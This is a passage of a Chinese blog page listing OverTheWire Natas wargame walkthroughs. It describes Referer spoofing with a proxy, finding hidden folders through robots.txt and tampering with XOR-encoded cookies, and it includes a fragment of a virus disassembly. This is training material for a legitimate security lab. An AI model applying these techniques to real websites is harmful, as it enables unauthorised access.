访问的网站才能看到密码”,在 http 的 refer 字段中表明来源,所以我们需要修改这个字段的值为上面的网址。拦截浏览器发送的请求,修改 refer 字段中的值为上述网址,然后点击 Forward,即可看到密码。爬虫在收集网页信息时,首先查看该网页的 robot.txt 文件,从中获取可以爬取的内容信息。右键->查看网页源代码,发现什么都没有,但是这时候一行字引起我们的注意,Google 都找不到这个网站。我们可以看到 /s3cr3t/ 文件夹,在浏览器中打开它,我们就可以看到密码了。
natas通关记录
weixin_42728957的博客
12-10 3180
OverTheWire 是一个 wargame 网站。其中 Natas 是一个适合Web安全基础的游戏,在Natas 中,我们需要通过找到网站的漏洞获得通往下一关的密码。每一关都有一个网站,类似 http://natasX.natas.labs.overthewire.org,其中X是每一关的编号。每一关都要输入用户名(例如,level0的用户名是natas0)及其密码才能访问。所有密码存储在...
OverTheWire:Wargame-Natas通关指引
weixin_47610939的博客
01-20 4202
OverTheWire的Wargame系列有很多,Natas是关于web渗透的wargame,通过Natas的训练,掌握基本的Web渗透技巧
natas通关笔记
sillage
04-18 714
natas通关笔记0-100123 0-10 0 访问:http://natas0.natas.labs.overthewire.org/ 用户和密码都是natas0 登陆后通过查看页面源码我们可以看到下一级密码为: gtVrDuiDfck831PqWsLEZy5gyDz1clto 1 登进去页面显示: You can find the password for the next level on this page, but rightclicking has been blocked! 脑海中不禁想起
natas(level0-level14)通关详细指南()
tempulcc的博客
09-24 2992
natas通关指南level0level1level2level3level4 很久以前玩的一个Web安全的通关游戏Natas,每一关的地址是http://natasX.natas.labs.overthewire.org,其中X代表当前关数,默认用户名是nataX(eg.natas0 是level0的用户名),通过当前的一关获取进入下一关的密码。 level0 URL: http://natas0.natas.labs.overthewire.org Username: natas0 Password:
natasNatas Natas教授服务器端Web安全的基础知识。 每个nata级别都由位于http://natasX.natas.labs.overthewire.org上的自己的网站组成,其中X是级别编号。 没有SSH登录。 要访问某个级别,请输入该级别的用户名(例如,级别0的natas0)及其密码。 每个级别都可以访问下一个级别的密码。 您的工作是以某种方式获取下一个密码并进行升级。 所有密码也都存储在etcnatas_webpass中。 例如,natas5的密码存储在文件etcnatas_web
02-23
natasNatas Natas教授服务器端Web安全的基础知识。 每个nata级别都由位于http://natasX.natas.labs.overthewire.org上的自己的网站组成,其中X是级别编号。 没有SSH登录。 要访问某个级别,请输入该级别的用户名(例如,级别0的natas0)及其密码。 每个级别都可以访问下一个级别的密码。 您的工作是以某种方式获取下一个密码并进行升级。 所有密码也都存储在etcnatas_webpass中。 例如,natas5的密码存储在文件etcnatas_webpassnatas5中,并且只能由natas4和natas5读取
natas11-20)
半夜好饿的博客
08-18 1085
natas11: 同样查看源码,审计。想要得到密码,需要使showpassword设置为yes,loadData函数是将cookie的值解密还原,存储与mydata数组中,并返回mydata。而savaData函数则是将传入的参数进行编码处理,存在COOKIE[“data”]中。 由此大体思路为,构造新的输入参数,是的showpassword值设置为yes,编码后得到新的data值。但完成这步,需...
natas
02-23
win2000下的用raw socket对IP数据包监听分析的程序
Natas 幽灵王病毒分析
ba_wang_mao的专栏
10-10 4986
9E80:0000 0E PUSH CS 9E80:0001 1F POP DS 9E80:0002 E89400 CALL 0099 ;保存 INT 13/15/21/40 9E80:0005 A27304 MOV [0473],AL ;AL = 0 9E80:0008 A21114 MOV [1411],AL 9E80:000B 8EC0 MOV ES,AX 9E80:000D 5F POP DI 9E80:000E 83EF03 SUB DI,+03 9E80:0011 50 PUSH .
python字符串与字符串抑或解析(natas11 python解法)
飞鸟的博客
03-01 466
问题描述 我在做natas11的时候发现了一个问题,问题的需求可以简化为: $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE[&quot;data&quot;])), true); 其中xor_decode的实现为: function xor_encrypt($in) { $key = '&amp;lt;censored&amp;gt;'; $te...
Natas通关指南(1-10)
蚁景网安学院
08-22 835
OverTheWire 是一个 wargame 网站。其中Natas是一个适合Web安全基础的游戏,在Natas 中,我们需要通过找到网站的漏洞获得通往下一关的密码。每一关都有一...
natas通关小游戏(未完待续)
weixin_41023022的博客
08-23 1020
地址:http://overthewire.org/wargames/natas/ level 0 -&gt; level 1 You can find the password for the next level on this page.(你可以在此界面找到下一级别的代码) 于是查看源码,发现答案在注释中 natas:gtVrDuiDfck831PqWsLEZy5gyDz1clt...
OverTheWire:Natas通关思路记录和介绍(持续更新中2019.03.14)
cynthrial的博客
03-01 4199
OverTheWire:Natas通关思路记录和介绍前言什么是Natas通关思路Natas Level 0Natas Level 0 → Level 1Natas Level 1 → Level 2Natas Level 2 → Level 3Natas Level 3 → Level 4Natas Level 4 → Level 5Natas Level 5 → Level 6 前言 为什么这个...
OverTheWire的Natas
公众号shadow sock7
11-06 1358
题目: http://overthewire.org/wargames/natas/ Write-up: http://perso.heavyberry.com/articles/2014-01/natas禁用上下文按钮(右键)<body oncontextmenu="javascript:alert('right clicking has been blocked!');return fal
wargame-Natas(1-20)
weixin_43220691的博客
11-30 2558
wargame-natas write up
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无极921

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值